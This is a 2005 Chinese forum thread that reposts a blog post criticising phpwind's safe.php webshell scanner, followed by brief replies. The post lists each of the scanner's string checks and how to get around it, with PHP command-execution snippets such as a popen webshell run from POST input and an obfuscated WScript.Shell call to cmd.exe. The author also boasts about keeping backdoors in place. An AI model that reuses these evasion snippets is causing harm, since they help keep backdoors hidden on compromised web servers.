引自安全天使（phpwind开发的php木马, 恶意程序查杀工具有何用?? ）

天地无用 · 发表于 2005 年 4 月 24 日 14:55:44

马上注册，结交更多好友，享用更多功能，让你轻松玩转社区。

您需要登录才可以下载或查看，没有账号？注册

×

phpwind开发的php木马, 恶意程序查杀工具有何用??
Submitted by angel on 2005, April 24, 5:46 AM. 技术
看看phpwind官方的介绍!!我不得不好奇的来看看。道怎么比魔高了？

-----------------------------------------
服务器 php 木马, 恶意程序查杀工具(适用于1.3.6 与 2.0.1 版被攻击站点的安全检测)

使用后99%可以根除您空间上的恶意程序与 php木马程序
-----------------------------------------

哎，看来phpwind的开发人员在这方面有点愚笨，我来一句一句分析一下safe.php文件的核心。

1、strpos($a,'shell_exec')!==false
如果包含shell_exec，杀

我这样绕过：
-------------
system();
-------------
passthru();
-------------
exec();
-------------
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
-------------
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die(&quot

HP Create COM WSHSHELL failed");
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;

2、strpos($a,'eval($_')!==false
如果包含eval($_，杀

我这样绕过：
eval($a);

3、strpos($a,'move_uploaded_file($_FILES')!==false
如果包含move_uploaded_file($_FILES，杀

我这样绕过：
move_uploaded_file($a,$b);

4、strpos($a,'copy($_FILES')!==false
如果包含copy($_FILES，杀

我这样绕过：
copy($a,$b);

完了！！就这样结束了！全部绕过了！后门继续留着。唉。真的不知道这个工具有什么用，骗骗菜鸟站长？为什么只能用在phpwind的站点？又怎么99％根除恶意程序了？？

到我这里应该是99.999999％不能根除恶意程序！！！使用这个和不使用简直没分别。希望我手头没有各位PHPWIND站长的后门哦。不要以为有了这个safe.php就高枕无忧了。嘻嘻。道高一尺，魔绝对要高一丈的……改变不了的事实。

xchange · 发表于 2005 年 4 月 24 日 14:56:54

呵呵，phpwind又被bs了

johan · 发表于 2005 年 4 月 24 日 15:14:51

术业有专攻，没有什么值得说的
再说了，PHPWIND又不是搞安全的
而ANGEL是专搞这方面的：就好比黑客之于微软
有什么呢？！
不要大惊小怪~~~~~

姜运涛 · 发表于 2005 年 4 月 24 日 15:15:46

什么东西都是久了就会被发现其不好的地方

kokgog · 发表于 2005 年 4 月 24 日 15:18:43

后门是有的面包也是有的

姜运涛 · 发表于 2005 年 4 月 24 日 15:25:30

世界也是相对的

esnak · 发表于 2005 年 4 月 24 日 15:32:28

所以俺不用论坛

天地无用 · 发表于 2005 年 4 月 24 日 14:55:44

phpwind开发的php木马, 恶意程序查杀工具有何用??
Submitted by angel on 2005, April 24, 5:46 AM. 技术
看看phpwind官方的介绍!!我不得不好奇的来看看。道怎么比魔高了？

-----------------------------------------
服务器 php 木马, 恶意程序查杀工具(适用于1.3.6 与 2.0.1 版被攻击站点的安全检测)

使用后99%可以根除您空间上的恶意程序与 php木马程序
-----------------------------------------

哎，看来phpwind的开发人员在这方面有点愚笨，我来一句一句分析一下safe.php文件的核心。

1、strpos($a,'shell_exec')!==false
如果包含shell_exec，杀

我这样绕过：
-------------
system();
-------------
passthru();
-------------
exec();
-------------
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
-------------
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die(&quot

HP Create COM WSHSHELL failed");
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;

2、strpos($a,'eval($_')!==false
如果包含eval($_，杀

我这样绕过：
eval($a);

3、strpos($a,'move_uploaded_file($_FILES')!==false
如果包含move_uploaded_file($_FILES，杀

我这样绕过：
move_uploaded_file($a,$b);

4、strpos($a,'copy($_FILES')!==false
如果包含copy($_FILES，杀

我这样绕过：
copy($a,$b);

完了！！就这样结束了！全部绕过了！后门继续留着。唉。真的不知道这个工具有什么用，骗骗菜鸟站长？为什么只能用在phpwind的站点？又怎么99％根除恶意程序了？？

到我这里应该是99.999999％不能根除恶意程序！！！使用这个和不使用简直没分别。希望我手头没有各位PHPWIND站长的后门哦。不要以为有了这个safe.php就高枕无忧了。嘻嘻。道高一尺，魔绝对要高一丈的……改变不了的事实。

账号		自动登录	找回密码
密码			注册

引自 安全天使 （phpwind开发的php木马, 恶意程序查杀工具有何用?? ）

马上注册，结交更多好友，享用更多功能，让你轻松玩转社区。